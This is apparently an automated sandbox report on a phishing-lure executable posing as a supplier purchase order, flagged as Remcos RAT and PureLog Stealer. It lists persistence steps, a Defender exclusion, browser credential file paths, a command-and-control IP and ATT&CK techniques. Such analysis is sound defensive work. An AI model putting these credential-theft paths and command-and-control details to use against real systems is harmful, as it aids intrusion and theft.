                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeQueries volume information: C:\Users\user\AppData\Roaming\keHuNxIumw.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_0041A045 __EH_prolog,GdiplusStartup,CreateDirectoryW,Sleep,Sleep,GetLocalTime,Sleep,12_2_0041A045
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_0041B69E GetUserNameW,12_2_0041B69E
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,12_2_00449210
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 0.2.Supplier Purchase Order - PO0002491.exe.7aa0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Supplier Purchase Order - PO0002491.exe.7aa0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2168286100.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2162828699.0000000004379000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 12.2.keHuNxIumw.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Supplier Purchase Order - PO0002491.exe.4485430.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.keHuNxIumw.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Supplier Purchase Order - PO0002491.exe.4ec0e08.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Supplier Purchase Order - PO0002491.exe.4ec0e08.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Supplier Purchase Order - PO0002491.exe.4485430.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000C.00000002.2239762591.00000000015D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.4560625385.0000000000C97000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2162828699.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2162828699.0000000004379000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Supplier Purchase Order - PO0002491.exe PID: 1868, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Supplier Purchase Order - PO0002491.exe PID: 5972, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: keHuNxIumw.exe PID: 4464, type: MEMORYSTR
                      Contains functionality to steal Chrome passwords or cookies
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data12_2_0040BA4D
                      Contains functionality to steal Firefox passwords or cookies
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\12_2_0040BB6B
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: \key3.db12_2_0040BB6B

                      Remote Access Functionality

                      barindex
                      Detected Remcos RAT
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-GOFAGZJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-GOFAGZJump to behavior
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 0.2.Supplier Purchase Order - PO0002491.exe.7aa0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Supplier Purchase Order - PO0002491.exe.7aa0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2168286100.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2162828699.0000000004379000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 12.2.keHuNxIumw.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Supplier Purchase Order - PO0002491.exe.4485430.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.keHuNxIumw.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Supplier Purchase Order - PO0002491.exe.4ec0e08.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Supplier Purchase Order - PO0002491.exe.4ec0e08.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Supplier Purchase Order - PO0002491.exe.4485430.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000C.00000002.2239762591.00000000015D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.4560625385.0000000000C97000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2162828699.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2162828699.0000000004379000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Supplier Purchase Order - PO0002491.exe PID: 1868, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Supplier Purchase Order - PO0002491.exe PID: 5972, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: keHuNxIumw.exe PID: 4464, type: MEMORYSTR
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: cmd.exe12_2_0040569A

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                      Native API                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		11
                      Disable or Modify Tools                      		1
                      OS Credential Dumping                      		2
                      System Time Discovery                      		Remote Services11
                      Archive Collected Data                      		12
                      Ingress Tool Transfer                      		Exfiltration Over Other Network Medium1
                      System Shutdown/Reboot
                      CredentialsDomainsDefault Accounts1
                      Command and Scripting Interpreter                      		1
                      Windows Service                      		1
                      Bypass User Account Control                      		1
                      Deobfuscate/Decode Files or Information                      		111
                      Input Capture                      		1
                      Account Discovery                      		Remote Desktop Protocol111
                      Input Capture                      		2
                      Encrypted Channel                      		Exfiltration Over Bluetooth1
                      Defacement
                      Email AddressesDNS ServerDomain Accounts1
                      Scheduled Task/Job                      		1
                      Scheduled Task/Job                      		1
                      Access Token Manipulation                      		3
                      Obfuscated Files or Information                      		2
                      Credentials In Files                      		1
                      System Service Discovery                      		SMB/Windows Admin Shares3
                      Clipboard Data                      		1
                      Remote Access Software                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts2
                      Service Execution                      		Login Hook1
                      Windows Service                      		22
                      Software Packing                      		NTDS3
                      File and Directory Discovery                      		Distributed Component Object ModelInput Capture2
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script122
                      Process Injection                      		1
                      Timestomp                      		LSA Secrets33
                      System Information Discovery                      		SSHKeylogging12
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                      Scheduled Task/Job                      		1
                      DLL Side-Loading                      		Cached Domain Credentials121
                      Security Software Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Bypass User Account Control                      		DCSync31
                      Virtualization/Sandbox Evasion                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      Masquerading                      		Proc Filesystem3
                      Process Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt31
                      Virtualization/Sandbox Evasion                      		/etc/passwd and /etc/shadow1
                      Application Window Discovery                      		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                      Access Token Manipulation                      		Network Sniffing1
                      System Owner/User Discovery                      		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd122
                      Process Injection                      		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1541115 Sample: Supplier Purchase Order - P... Startdate: 24/10/2024 Architecture: WINDOWS Score: 100 42 geoplugin.net 2->42 48 Suricata IDS alerts for network traffic 2->48 50 Found malware configuration 2->50 52 Malicious sample detected (through community Yara rule) 2->52 54 16 other signatures 2->54 8 keHuNxIumw.exe 5 2->8         started        11 Supplier Purchase Order - PO0002491.exe 7 2->11         started        signatures3 process4 file5 56 Multi AV Scanner detection for dropped file 8->56 58 Contains functionality to bypass UAC (CMSTPLUA) 8->58 60 Contains functionalty to change the wallpaper 8->60 66 5 other signatures 8->66 14 keHuNxIumw.exe 8->14         started        17 schtasks.exe 1 8->17         started        34 C:\Users\user\AppData\...\keHuNxIumw.exe, PE32 11->34 dropped 36 C:\Users\...\keHuNxIumw.exe:Zone.Identifier, ASCII 11->36 dropped 38 C:\Users\user\AppData\Local\...\tmp9421.tmp, XML 11->38 dropped 40 Supplier Purchase ...- PO0002491.exe.log, ASCII 11->40 dropped 62 Adds a directory exclusion to Windows Defender 11->62 64 Injects a PE file into a foreign processes 11->64 19 Supplier Purchase Order - PO0002491.exe 3 13 11->19         started        22 powershell.exe 23 11->22         started        24 schtasks.exe 1 11->24         started        signatures6 process7 dnsIp8 26 conhost.exe 17->26         started        44 192.210.150.14, 2404, 49708 AS-COLOCROSSINGUS United States 19->44 46 geoplugin.net 178.237.33.50, 49710, 80 ATOM86-ASATOM86NL Netherlands 19->46 68 Detected Remcos RAT 19->68 70 Loading BitLocker PowerShell Module 22->70 28 WmiPrvSE.exe 22->28         started        30 conhost.exe 22->30         started        32 conhost.exe 24->32         started        signatures9 process10

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Supplier Purchase Order - PO0002491.exe74%ReversingLabsByteCode-MSIL.Backdoor.Remcos
                      Supplier Purchase Order - PO0002491.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\keHuNxIumw.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\keHuNxIumw.exe74%ReversingLabsByteCode-MSIL.Backdoor.Remcos

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://geoplugin.net/json.gp0%URL Reputationsafe
                      http://geoplugin.net/json.gp/C0%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      geoplugin.net
                      		178.237.33.50
                      		truefalse
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://geoplugin.net/json.gpfalse
                        • URL Reputation: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://geoplugin.net/Supplier Purchase Order - PO0002491.exe, 00000007.00000002.4560625385.0000000000CDF000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameP#keHuNxIumw.exe, 00000008.00000002.2241166985.0000000002B46000.00000004.00000800.00020000.00000000.sdmpfalse
                            		unknown
                            http://geoplugin.net/json.gp/CSupplier Purchase Order - PO0002491.exe, 00000000.00000002.2162828699.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, Supplier Purchase Order - PO0002491.exe, 00000000.00000002.2162828699.0000000004379000.00000004.00000800.00020000.00000000.sdmp, keHuNxIumw.exe, 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://geoplugin.net/json.gplSupplier Purchase Order - PO0002491.exe, 00000007.00000002.4560625385.0000000000CDF000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSupplier Purchase Order - PO0002491.exe, 00000000.00000002.2161767525.00000000033C6000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://geoplugin.net/json.gpSystem32Supplier Purchase Order - PO0002491.exe, 00000007.00000002.4560625385.0000000000CCD000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://tempuri.org/DataSet1.xsdSupplier Purchase Order - PO0002491.exe, keHuNxIumw.exe.0.drfalse
                                  		unknown

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  192.210.150.14
                                  		unknownUnited States
                                  		36352AS-COLOCROSSINGUStrue
                                  178.237.33.50
                                  		geoplugin.netNetherlands
                                  		8455ATOM86-ASATOM86NLfalse

                                  General Information

                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1541115
                                  Start date and time:2024-10-24 12:57:06 +02:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 9m 4s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:15
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:Supplier Purchase Order - PO0002491.exe
                                  Detection:MAL
                                  Classification:mal100.rans.troj.spyw.expl.evad.winEXE@16/12@1/2
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 99%
                                  • Number of executed functions: 78
                                  • Number of non-executed functions: 219
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                                  Warnings

                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size getting too big, too many NtCreateKey calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • VT rate limit hit for: Supplier Purchase Order - PO0002491.exe

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  06:58:10API Interceptor4370903x Sleep call for process: Supplier Purchase Order - PO0002491.exe modified
                                  06:58:11API Interceptor16x Sleep call for process: powershell.exe modified
                                  06:58:18API Interceptor1x Sleep call for process: keHuNxIumw.exe modified
                                  12:58:13Task SchedulerRun new task: keHuNxIumw path: C:\Users\user\AppData\Roaming\keHuNxIumw.exe

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  178.237.33.50SecuriteInfo.com.W32.MSIL_Kryptik.KMZ.gen.Eldorado.27390.3879.exeGet hashmaliciousRemcosBrowse
                                  • geoplugin.net/json.gp
                                  Belialist.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                  • geoplugin.net/json.gp
                                  #PO247762.docxGet hashmaliciousRemcosBrowse
                                  • geoplugin.net/json.gp
                                  PO NAHK22012FA00000.docx.docGet hashmaliciousRemcosBrowse
                                  • geoplugin.net/json.gp
                                  ZW_PCCE-010023024001.batGet hashmaliciousRemcos, GuLoaderBrowse
                                  • geoplugin.net/json.gp
                                  SecuriteInfo.com.Win32.Evo-gen.798.4975.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                  • geoplugin.net/json.gp
                                  Unicredit.Pagamento.pdf.exeGet hashmaliciousRemcosBrowse
                                  • geoplugin.net/json.gp
                                  1729665545edfb4dcad6b11392886f70983a48d15d8c5f732d18482fa331af6423098ce7b3187.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                  • geoplugin.net/json.gp
                                  nicworkgbeeterworkgoodthingswithgereatniceforme.htaGet hashmaliciousCobalt Strike, Remcos, DBatLoaderBrowse
                                  • geoplugin.net/json.gp
                                  EX0096959.docx.docGet hashmaliciousRemcosBrowse
                                  • geoplugin.net/json.gp

                                  Domains

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  geoplugin.netSecuriteInfo.com.W32.MSIL_Kryptik.KMZ.gen.Eldorado.27390.3879.exeGet hashmaliciousRemcosBrowse
                                  • 178.237.33.50
                                  Belialist.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                  • 178.237.33.50
                                  #PO247762.docxGet hashmaliciousRemcosBrowse
                                  • 178.237.33.50
                                  PO NAHK22012FA00000.docx.docGet hashmaliciousRemcosBrowse
                                  • 178.237.33.50
                                  ZW_PCCE-010023024001.batGet hashmaliciousRemcos, GuLoaderBrowse
                                  • 178.237.33.50
                                  SecuriteInfo.com.Win32.Evo-gen.798.4975.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                  • 178.237.33.50
                                  Unicredit.Pagamento.pdf.exeGet hashmaliciousRemcosBrowse
                                  • 178.237.33.50
                                  1729665545edfb4dcad6b11392886f70983a48d15d8c5f732d18482fa331af6423098ce7b3187.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                  • 178.237.33.50
                                  nicworkgbeeterworkgoodthingswithgereatniceforme.htaGet hashmaliciousCobalt Strike, Remcos, DBatLoaderBrowse
                                  • 178.237.33.50
                                  EX0096959.docx.docGet hashmaliciousRemcosBrowse
                                  • 178.237.33.50

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  AS-COLOCROSSINGUSbot.arm7.elfGet hashmaliciousMirai, OkiruBrowse
                                  • 192.210.187.71
                                  bot.arm.elfGet hashmaliciousMirai, OkiruBrowse
                                  • 192.210.187.71
                                  bot.m68k.elfGet hashmaliciousMirai, OkiruBrowse
                                  • 192.210.187.71
                                  transferencia interbancaria_66579.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                  • 107.172.31.13
                                  Comprobante de pago.xlam.xlsxGet hashmaliciousUnknownBrowse
                                  • 192.3.216.142
                                  Orden de Compra No. 78986756565344657.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                  • 198.46.178.134
                                  Shipping Documents WMLREF115900.xlsGet hashmaliciousLokibotBrowse
                                  • 192.3.176.141
                                  A & C Metrology OC 5457144.xlsGet hashmaliciousUnknownBrowse
                                  • 192.210.215.8
                                  #PO247762.docxGet hashmaliciousRemcosBrowse
                                  • 104.168.7.51
                                  la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                  • 192.3.165.37
                                  ATOM86-ASATOM86NLSecuriteInfo.com.W32.MSIL_Kryptik.KMZ.gen.Eldorado.27390.3879.exeGet hashmaliciousRemcosBrowse
                                  • 178.237.33.50
                                  Belialist.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                  • 178.237.33.50
                                  #PO247762.docxGet hashmaliciousRemcosBrowse
                                  • 178.237.33.50
                                  PO NAHK22012FA00000.docx.docGet hashmaliciousRemcosBrowse
                                  • 178.237.33.50
                                  ZW_PCCE-010023024001.batGet hashmaliciousRemcos, GuLoaderBrowse
                                  • 178.237.33.50
                                  SecuriteInfo.com.Win32.Evo-gen.798.4975.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                  • 178.237.33.50
                                  Unicredit.Pagamento.pdf.exeGet hashmaliciousRemcosBrowse
                                  • 178.237.33.50
                                  1729665545edfb4dcad6b11392886f70983a48d15d8c5f732d18482fa331af6423098ce7b3187.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                  • 178.237.33.50
                                  nicworkgbeeterworkgoodthingswithgereatniceforme.htaGet hashmaliciousCobalt Strike, Remcos, DBatLoaderBrowse
                                  • 178.237.33.50
                                  EX0096959.docx.docGet hashmaliciousRemcosBrowse
                                  • 178.237.33.50

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Supplier Purchase Order - PO0002491.exe.log

                                  Download File
                                  Process:C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):1216
                                  Entropy (8bit):5.34331486778365
                                  Encrypted:false
                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                  Malicious:true
                                  Reputation:high, very likely benign file
